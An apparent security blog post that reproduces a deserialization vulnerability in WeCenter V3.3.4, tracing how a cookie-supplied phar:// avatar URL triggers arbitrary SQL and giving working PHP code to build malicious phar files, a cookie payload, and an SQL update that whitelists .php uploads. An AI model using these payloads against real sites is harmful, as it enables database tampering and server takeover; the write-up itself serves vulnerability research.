<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="代码审计,">










<meta name="description" content="前言该漏洞的实质触发原因是由于可以通过反序列化来执行任意sql语句，导致可以在数据库中更改上传文件的限制类型，最后达到可以上传任意PHP文件的效果 代码分析漏洞利用点文件位置在./system/aws_model.inc.php，该文件中存在一个AWS_MODEL类，重点关注一下该类的__destruct方法  该方法遍历了$_shutdown_query，然后执行了query方法，跟进去看一下">
<meta name="keywords" content="代码审计">
<meta property="og:type" content="article">
<meta property="og:title" content="WeCenter V3.3.4漏洞复现">
<meta property="og:url" content="https://yml-sec.top/2020/02/29/WeCenter-V3-3-4漏洞复现/index.html">
<meta property="og:site_name" content="yemoli&#39;s blog">
<meta property="og:description" content="前言该漏洞的实质触发原因是由于可以通过反序列化来执行任意sql语句，导致可以在数据库中更改上传文件的限制类型，最后达到可以上传任意PHP文件的效果 代码分析漏洞利用点文件位置在./system/aws_model.inc.php，该文件中存在一个AWS_MODEL类，重点关注一下该类的__destruct方法  该方法遍历了$_shutdown_query，然后执行了query方法，跟进去看一下">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://yml-sec.top/2020/02/29/WeCenter-V3-3-4漏洞复现/1.png">
<meta property="og:image" content="https://yml-sec.top/2020/02/29/WeCenter-V3-3-4漏洞复现/2.png">
<meta property="og:image" content="https://yml-sec.top/2020/02/29/WeCenter-V3-3-4漏洞复现/3.png">
<meta property="og:image" content="https://yml-sec.top/2020/02/29/WeCenter-V3-3-4漏洞复现/4.png">
<meta property="og:image" content="https://yml-sec.top/2020/02/29/WeCenter-V3-3-4漏洞复现/5.png">
<meta property="og:image" content="https://yml-sec.top/2020/02/29/WeCenter-V3-3-4漏洞复现/6.png">
<meta property="og:image" content="https://yml-sec.top/2020/02/29/WeCenter-V3-3-4漏洞复现/7.png">
<meta property="og:image" content="https://yml-sec.top/2020/02/29/WeCenter-V3-3-4漏洞复现/8.png">
<meta property="og:image" content="https://yml-sec.top/2020/02/29/WeCenter-V3-3-4漏洞复现/9.png">
<meta property="og:image" content="https://yml-sec.top/2020/02/29/WeCenter-V3-3-4漏洞复现/10.png">
<meta property="og:image" content="https://yml-sec.top/2020/02/29/WeCenter-V3-3-4漏洞复现/11.png">
<meta property="og:updated_time" content="2020-03-01T05:33:50.003Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="WeCenter V3.3.4漏洞复现">
<meta name="twitter:description" content="前言该漏洞的实质触发原因是由于可以通过反序列化来执行任意sql语句，导致可以在数据库中更改上传文件的限制类型，最后达到可以上传任意PHP文件的效果 代码分析漏洞利用点文件位置在./system/aws_model.inc.php，该文件中存在一个AWS_MODEL类，重点关注一下该类的__destruct方法  该方法遍历了$_shutdown_query，然后执行了query方法，跟进去看一下">
<meta name="twitter:image" content="https://yml-sec.top/2020/02/29/WeCenter-V3-3-4漏洞复现/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://yml-sec.top/2020/02/29/WeCenter-V3-3-4漏洞复现/">





  <title>WeCenter V3.3.4漏洞复现 | yemoli's blog</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">yemoli's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-friends">
          <a href="/friends/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            friends
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://yml-sec.top/2020/02/29/WeCenter-V3-3-4漏洞复现/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="夜莫离、">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="yemoli's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">WeCenter V3.3.4漏洞复现</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-02-29T18:23:14+08:00">
                2020-02-29
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  1.1k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  4
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>该漏洞的实质触发原因是由于可以通过反序列化来执行任意<code>sql</code>语句，导致可以在数据库中更改上传文件的限制类型，最后达到可以上传任意<code>PHP</code>文件的效果</p>
<h2 id="代码分析"><a href="#代码分析" class="headerlink" title="代码分析"></a>代码分析</h2><p>漏洞利用点文件位置在<code>./system/aws_model.inc.php</code>，该文件中存在一个<code>AWS_MODEL</code>类，重点关注一下该类的<code>__destruct</code>方法</p>
<p><img src="/2020/02/29/WeCenter-V3-3-4漏洞复现/1.png" alt="1"></p>
<p>该方法遍历了<code>$_shutdown_query</code>，然后执行了query方法，跟进去看一下</p>
<p><img src="/2020/02/29/WeCenter-V3-3-4漏洞复现/2.png" alt="2"></p>
<p>该方法的功能是执行传入的<code>SQL</code>语句，那么也就是说我们只要控制了<code>$_shutdown_query</code>就可以执行任意的语句了，可以注意到该变量是该类中的私有成员变量</p>
<p><img src="/2020/02/29/WeCenter-V3-3-4漏洞复现/3.png" alt="3"></p>
<p>如果存在反序列化的点，我们就可以控制<code>$_shutdown_query</code>的值来执行任意<code>SQL</code>语句，于是接着来寻找反序列化的触发方法</p>
<p>在本例中反序列化是利用<code>phar</code>进行触发的，触发点文件在<code>./models/account.php</code>，在该文件的<code>account_class</code>类中，存在着这样一个函数</p>
<p><img src="/2020/02/29/WeCenter-V3-3-4漏洞复现/4.png" alt="4"></p>
<p>如果该函数中的<code>$headimgurl</code>是可控的，就可以通过<code>file_get_contents</code>函数来触发<code>phar</code>反序列化，通过搜索发现在<code>./app/account/ajax.php</code>中的<code>synch_img_action</code>函数调用了<code>associate_remote_avatar</code>函数</p>
<p><img src="/2020/02/29/WeCenter-V3-3-4漏洞复现/5.png" alt="5">  </p>
<p>在这里我们需要控制的是<code>$wxuser[&#39;headimgurl&#39;]</code>，而<code>synch_img_action</code>对于<code>$wxuser[&#39;headimgurl&#39;]</code>的获取是来源于数据库中的<code>users_weixin</code>表的，所以我们想控制其值必须找到对<code>users_weixin</code>表中<code>headimgurl</code>字段操作的代码，通过搜索发现<code>./models/openid/weixin/weixin.php</code>文件中<code>bind_account</code>函数存在着对该表的插入操作</p>
<p><img src="/2020/02/29/WeCenter-V3-3-4漏洞复现/6.png" alt="6"></p>
<p>接下来需要找到<code>bind_account</code>函数的调用位置，并且需要使其参数可控，通过搜索关注到<code>binding_action</code>函数，该函数在<code>/app/m/weixin.php</code>文件中</p>
<p><img src="/2020/02/29/WeCenter-V3-3-4漏洞复现/7.png" alt="7"></p>
<p>可以看到该函数中在调用<code>bind_account</code>函数传入参数时，参数的值都是从<code>cookie</code>中获取的，这样我们就可以通过cookie来控制传入的参数值，而<code>binding_action</code>这个方法可以通过路由访问直接调用，所以我们基本上就可以来执行任意SQL语句了</p>
<p>接着来梳理一下流程，首先我们控制<code>cookie</code>然后调用<code>binding_action</code>函数，使其调用<code>bind_account</code>函数并带入我们控制的参数，该函数将会把我们构造的<code>headimgurl</code>插入到数据库中，在我们调用<code>synch_img_action</code>方法时，该方法会将<code>headimgurl</code>取出来并调用<code>associate_remote_avatar</code>函数，该函数会调用<code>file_get_contents($headimgurl)</code>来触发<code>phar</code>反序列化，进而执行任意<code>sql</code>语句</p>
<h2 id="实际测试"><a href="#实际测试" class="headerlink" title="实际测试"></a>实际测试</h2><p>下面首先编写反序列化的生成代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">AWS_MODEL</span></span>&#123;</span><br><span class="line">	<span class="keyword">private</span> $_shutdown_query = <span class="keyword">array</span>();</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span>&#123;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;_shutdown_query = <span class="keyword">array</span>(<span class="string">"a"</span>=&gt;<span class="string">"SELECT UPDATEXML(1, concat(0xa, user(), 0xa), 1)"</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">$phar = <span class="keyword">new</span> Phar(<span class="string">"phar.phar"</span>); <span class="comment">//后缀名必须为phar</span></span><br><span class="line">$phar-&gt;startBuffering();</span><br><span class="line">$phar-&gt;setStub(<span class="string">"&lt;?php __HALT_COMPILER(); ?&gt;"</span>); <span class="comment">//设置stub</span></span><br><span class="line">$o = <span class="keyword">new</span> AWS_MODEL();</span><br><span class="line">$phar-&gt;setMetadata($o); <span class="comment">//将自定义的meta-data存入manifest</span></span><br><span class="line">$phar-&gt;addFromString(<span class="string">"test.txt"</span>, <span class="string">"test"</span>); <span class="comment">//添加要压缩的文件</span></span><br><span class="line">$phar-&gt;stopBuffering();</span><br></pre></td></tr></table></figure>
<p>在提问的编辑器处进行文件上传，会返回文件路径</p>
<p><img src="/2020/02/29/WeCenter-V3-3-4漏洞复现/8.png" alt="8"></p>
<p>然后编写生成<code>cookie</code>的代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $a = <span class="keyword">array</span>();</span><br><span class="line">    $a[<span class="string">'access_token'</span>] = <span class="keyword">array</span>(<span class="string">'openid'</span> =&gt; <span class="string">'1'</span>);</span><br><span class="line">    $a[<span class="string">'access_user'</span>] = <span class="keyword">array</span>(<span class="string">'openid'</span>=&gt;<span class="number">1</span>,<span class="string">'nickname'</span>=&gt;<span class="string">'aaa'</span>,<span class="string">'headimgurl'</span>=&gt;<span class="string">'phar://uploads/question/20200229/f3f9cb0f135c2fd37c2446f863cc15d6.gif'</span>);</span><br><span class="line">    <span class="keyword">echo</span> json_encode($a);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">//&#123;"access_token":&#123;"openid":"1"&#125;,"access_user":&#123;"openid":1,"nickname":"aaa","headimgurl":"phar:\/\/uploads\/question\/20200229\/f3f9cb0f135c2fd37c2446f863cc15d6.gif"&#125;&#125;</span></span><br></pre></td></tr></table></figure>
<p>首先带着<code>cookie</code>调用<code>binding_action</code>方法，注意一下<code>cookie</code>的前缀需要抓包获取</p>
<p><img src="/2020/02/29/WeCenter-V3-3-4漏洞复现/9.png" alt="9"></p>
<p>然后去直接触发<code>synch_img_action</code>方法，就可以通过报错函数来得到sql执行结果</p>
<p><img src="/2020/02/29/WeCenter-V3-3-4漏洞复现/10.png" alt="10"></p>
<h2 id="深入分析"><a href="#深入分析" class="headerlink" title="深入分析"></a>深入分析</h2><p>登陆后台可以发现允许上传的文件类型是保存在数据库中的，执行更新后缀名的语句如下</p>
<p><img src="/2020/02/29/WeCenter-V3-3-4漏洞复现/11.png" alt="11"></p>
<p>我们可以仿照该语句来将<code>php</code>后缀名加入其中</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">AWS_MODEL</span></span>&#123;</span><br><span class="line">	<span class="keyword">private</span> $_shutdown_query = <span class="keyword">array</span>();</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span>&#123;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;_shutdown_query = <span class="keyword">array</span>(<span class="string">"a"</span>=&gt;<span class="string">"UPDATE `aws_system_setting` SET `value` = 's:45:\"jpg,jpeg,png,gif,zip,doc,docx,rar,pdf,psd,php\";' WHERE (`varname` = 'allowed_upload_types')"</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">$phar = <span class="keyword">new</span> Phar(<span class="string">"phar.phar"</span>); <span class="comment">//后缀名必须为phar</span></span><br><span class="line">$phar-&gt;startBuffering();</span><br><span class="line">$phar-&gt;setStub(<span class="string">"&lt;?php __HALT_COMPILER(); ?&gt;"</span>); <span class="comment">//设置stub</span></span><br><span class="line">$o = <span class="keyword">new</span> AWS_MODEL();</span><br><span class="line">$phar-&gt;setMetadata($o); <span class="comment">//将自定义的meta-data存入manifest</span></span><br><span class="line">$phar-&gt;addFromString(<span class="string">"test.txt"</span>, <span class="string">"test"</span>); <span class="comment">//添加要压缩的文件</span></span><br><span class="line">$phar-&gt;stopBuffering();</span><br></pre></td></tr></table></figure>
<p>按照上面的执行语句的流程，成功执行后即可将<code>php</code>后缀添加到白名单中，之后在编辑器中可直接上传php文件</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><blockquote>
<p><a href="https://xz.aliyun.com/t/7077" target="_blank" rel="noopener">https://xz.aliyun.com/t/7077</a></p>
<p><a href="https://mp.weixin.qq.com/s/uBmo9xXMVk42Qp3BP_x0Vw" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/uBmo9xXMVk42Qp3BP_x0Vw</a></p>
</blockquote>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>Donate</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechatpay.jpg" alt="夜莫离、 WeChat Pay">
        <p>WeChat Pay</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipay.jpg" alt="夜莫离、 Alipay">
        <p>Alipay</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/代码审计/" rel="tag"># 代码审计</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/02/26/春秋战“疫”easyphp题解/" rel="next" title="春秋战“疫”easyphp题解">
                <i class="fa fa-chevron-left"></i> 春秋战“疫”easyphp题解
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/03/06/thinkphp反序列化漏洞分析/" rel="prev" title="thinkphp反序列化漏洞分析">
                thinkphp反序列化漏洞分析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">夜莫离、</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">58</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">16</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/yemoli" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://chxing.xyz/" title="Bling_Dog" target="_blank">Bling_Dog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.smi1e.top/" title="Smi1e" target="_blank">Smi1e</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://altman.vip/" title="Altman" target="_blank">Altman</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.virtua1.cn/" title="Virtua1" target="_blank">Virtua1</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.zhaoj.in/" title="赵" target="_blank">赵</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.dongzt.cn/" title="Alkaid" target="_blank">Alkaid</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://cdusec.com/" title="CDUSEC" target="_blank">CDUSEC</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://cdusec.happyhacking.top/" title="CDUSEC内部博客" target="_blank">CDUSEC内部博客</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://jjhpkcr.xyz/" title="江江河畔砍柴人" target="_blank">江江河畔砍柴人</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.youknowi.xin/" title="图先生" target="_blank">图先生</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://a3ura.github.io/" title="a3ura" target="_blank">a3ura</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.recorday.cn/" title="C0d3r1iu" target="_blank">C0d3r1iu</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.iloveflag.com/" title="醉梦半醒" target="_blank">醉梦半醒</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#代码分析"><span class="nav-number">2.</span> <span class="nav-text">代码分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#实际测试"><span class="nav-number">3.</span> <span class="nav-text">实际测试</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#深入分析"><span class="nav-number">4.</span> <span class="nav-text">深入分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考链接"><span class="nav-number">5.</span> <span class="nav-text">参考链接</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">夜莫离、</span>

  
</div>


  <!-- <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div> 



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>-->



<div class="theme-info">
 <div class="powered-by"></div>
 <span class="post-count">博客全站共63.1k字</span>
</div>
        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

  
<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>
</body>
</html>
